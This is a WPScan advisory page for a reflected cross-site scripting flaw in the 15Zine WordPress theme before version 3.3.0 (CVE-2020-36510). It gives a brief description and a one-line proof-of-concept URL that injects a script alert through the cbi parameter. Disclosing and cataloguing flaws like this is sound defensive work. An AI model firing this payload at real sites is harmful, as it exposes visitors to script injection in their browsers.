WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

15Zine < 3.3.0 - Reflected Cross-Site Scripting

Description

The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=cb_s_a&cbi=<script>alert(/XSS/);</script>

Affects Themes

15zine
Fixed in version 3.3.0

References

CVE
CVE-2020-36510

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Fariq Fadillah Gusti Insani

Submitter

Fariq Fadillah Gusti Insani

Submitter website
https://fariqfgi.medium.com/
Submitter twitter
fariqfgi
Verified

Yes

WPVDB ID
d1dbc6d7-7488-40c2-bc38-0674ea5b3c95

Timeline

Publicly Published

2020-09-21 (about 2 years ago)

Added

2022-02-23 (about 9 months ago)

Last Updated

2022-04-12 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin